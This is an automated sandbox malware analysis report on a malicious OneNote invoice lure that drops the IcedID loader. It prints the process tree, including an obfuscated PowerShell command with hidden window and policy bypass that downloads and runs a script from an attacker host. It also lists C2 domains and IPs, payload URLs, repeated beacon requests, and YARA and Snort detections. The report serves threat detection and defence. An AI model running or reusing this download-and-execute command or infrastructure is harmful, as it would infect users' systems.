Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Inv_02_02_#6.one

Overview

General Information

Sample Name:Inv_02_02_#6.one
Analysis ID:797394
MD5:436d3e6c17fca8ec8f58061720feacb7
SHA1:5e531fb72d6b4baef2c58b5f28f93071d7fb2cb7
SHA256:9ab0514b205de5ea60ad1f2ee168f668b4c0af839b8c7c8b80d39c31a24d2119
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Malicious OneNote
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Yara detected IcedID
PowerShell case anomaly found
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • ONENOTE.EXE (PID: 1972 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Inv_02_02_#6.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • ONENOTEM.EXE (PID: 2040 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • mshta.exe (PID: 2100 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
    • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4608 cmdline: powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • rundll32.exe (PID: 5948 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,init MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 5848 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,init MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 2255569783, "C2 url": "kropnagursa.com"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Inv_02_02_#6.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~Inv_02_02_#6.one.onebackupconstructionJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security
      C:\Users\user\AppData\Local\Temp\{A7DEC174-262B-4913-BE2F-051CB37BE409}webshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
      • 0xc:$tagasp_long20: <script language="vb
      • 0x56:$asp_payload2: eval(
      • 0x54:$asp_payload4: : eval
      • 0x5c:$asp_payload8: execute(
      • 0x5b74:$asp_multi_payload_one1: CreateObject
      • 0x5b74:$asp_multi_payload_four1: CreateObject
      • 0x5b74:$asp_cr_write1: CreateObject(
      • 0x59a7:$m_multi_one4: mid(
      • 0x5b88:$oo1: i"&"n
      • 0x5b93:$oo1: S"&"y
      • 0x5be0:$oo1: e"&"r
      C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.binwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
      • 0xc:$tagasp_long20: <script language="vb
      • 0x56:$asp_payload2: eval(
      • 0x54:$asp_payload4: : eval
      • 0x5c:$asp_payload8: execute(
      • 0x5b74:$asp_multi_payload_one1: CreateObject
      • 0x5b74:$asp_multi_payload_four1: CreateObject
      • 0x5b74:$asp_cr_write1: CreateObject(
      • 0x59a7:$m_multi_one4: mid(
      • 0x5b88:$oo1: i"&"n
      • 0x5b93:$oo1: S"&"y
      • 0x5be0:$oo1: e"&"r
      C:\Users\user\Desktop\Inv_02_02_#6.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security
        C:\Users\user\AppData\Local\Temp\{693D2051-0F19-48F6-B744-37E31A4E8C6E}.binwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
        • 0xc:$tagasp_long20: <script language="vb
        • 0x56:$asp_payload2: eval(
        • 0x54:$asp_payload4: : eval
        • 0x5c:$asp_payload8: execute(
        • 0x5b74:$asp_multi_payload_one1: CreateObject
        • 0x5b74:$asp_multi_payload_four1: CreateObject
        • 0x5b74:$asp_cr_write1: CreateObject(
        • 0x59a7:$m_multi_one4: mid(
        • 0x5b88:$oo1: i"&"n
        • 0x5b93:$oo1: S"&"y
        • 0x5be0:$oo1: e"&"r

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000A.00000003.541445122.0000017521BBE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
          00000001.00000003.311152361.0000000000F81000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
          • 0x4c3a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
          • 0x906a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
          • 0x12c8:$asp_payload8: execute(
          • 0x1178:$asp_multi_payload_one1: CreateObject
          • 0x1276:$asp_multi_payload_one1: createobject
          • 0x6cc0:$asp_multi_payload_one1: CreateObject
          • 0x8d60:$asp_multi_payload_one1: CreateObject
          • 0x1178:$asp_multi_payload_four1: CreateObject
          • 0x1276:$asp_multi_payload_four1: createobject
          • 0x6cc0:$asp_multi_payload_four1: CreateObject
          • 0x8d60:$asp_multi_payload_four1: CreateObject
          • 0x1178:$asp_cr_write1: CreateObject(
          • 0x1276:$asp_cr_write1: createobject(
          • 0x6cc0:$asp_cr_write1: CreateObject(
          • 0x8d60:$asp_cr_write1: CreateObject(
          • 0x6af3:$m_multi_one4: mid(
          • 0x6cd4:$oo1: i"&"n
          • 0x6cdf:$oo1: S"&"y
          • 0x6d2c:$oo1: e"&"r
          00000001.00000003.311152361.0000000000F81000.00000004.00000020.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth (Nextron Systems)
          • 0x2eca:$sa1: -Enc
          • 0x2ea0:$sb1: -w hiddEn
          • 0x8e28:$sb1: -w hiddEn
          • 0x138a:$sc1: -nop
          • 0x2e96:$sc1: -nop
          • 0x30e2:$sc1: -nop
          • 0x8e1e:$sc1: -nop
          • 0x2eb4:$se1: -Ep bypass
          00000001.00000003.311152361.0000000000F81000.00000004.00000020.00020000.00000000.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth (Nextron Systems)
          • 0x2e82:$s1: powErshEll
          • 0x8c0f:$s1: PowerShell
          • 0x8e0a:$s1: powErshEll
          • 0x8c0f:$sn3: PowerShell
          00000001.00000003.311152361.0000000000FB3000.00000004.00000020.00020000.00000000.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth (Nextron Systems)
          • 0x110a:$s1: powErshEll
          • 0x12ba:$s1: powErshEll
          • 0x33b4:$s1: powErshEll
          • 0x33e2:$s1: powErshEll
          • 0x8606:$s1: PowerShell
          • 0x8606:$sn3: PowerShell
          Click to see the 71 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.2.rundll32.exe.17521b4ba80.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x1bb2:$internal_name: loader_dll_64.dll
          • 0x1eb8:$string6: WINHTTP.dll
          10.2.rundll32.exe.17521b4ba80.1.unpackWindows_Trojan_IcedID_11d24d35unknownunknown
          • 0x1bb2:$a2: loader_dll_64.dll
          10.2.rundll32.exe.17521b4ba80.1.unpackWindows_Trojan_IcedID_0b62e783unknownunknown
          • 0x9ee:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
          10.2.rundll32.exe.17521b4ba80.1.unpackWindows_Trojan_IcedID_48029e37unknownunknown
          • 0x143c:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
          10.2.rundll32.exe.17521b4ba80.1.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27b2:$internal_name: loader_dll_64.dll
          • 0x310c:$string0: _gat=
          • 0x3164:$string1: _ga=
          • 0x313c:$string2: _gid=
          • 0x30ee:$string4: _io=
          • 0x3170:$string5: GetAdaptersInfo
          • 0x2ab8:$string6: WINHTTP.dll
          • 0x3000:$string9: POST
          Click to see the 5 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi32_2100.amsi.csvPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth (Nextron Systems)
          • 0xfc3:$s1: powErshEll
          amsi32_4608.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.48.8.8.859683532023883 02/02/23-21:16:55.050715
            SID:2023883
            Source Port:59683
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngDAvira URL Cloud: Label: malware
            Yara detected IcedID
            Source: Yara matchFile source: 0000000A.00000003.541445122.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.594455037.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.555534226.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.721823197.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.560733182.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.531693872.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.612994519.0000017521BC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.497608477.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.543079236.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.536679847.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.584413640.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.500443586.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.494814109.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.546261720.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.581334234.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.499065524.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.601363468.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.520814674.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.606794312.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.592288032.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.600571140.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.528524217.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.590819954.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.621728773.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.612925082.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.557676790.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.493439373.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5848, type: MEMORYSTR
            Source: Yara matchFile source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPE
            Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: IcedID {"Campaign ID": 2255569783, "C2 url": "kropnagursa.com"}
            Source: Binary string: /var/tmp/build/firefox-7def1d4ea99a/obj-x86_64-w64-mingw32/mozglue/build/mozglue.pdb source: powershell.exe, 00000004.00000002.433111959.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmp, MZvYng.bin.4.dr

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 45.61.136.59 80Jump to behavior
            Source: C:\Windows\System32\rundll32.exeDomain query: kropnagursa.com
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:59683 -> 8.8.8.8:53
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: kropnagursa.com
            Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
            Source: global trafficHTTP traffic detected: GET /gatef.php HTTP/1.1Host: corsanave.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /dll/loader_p2_dll_64_n1_x64_inf.dll36.dll HTTP/1.1Host: corsanave.top
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
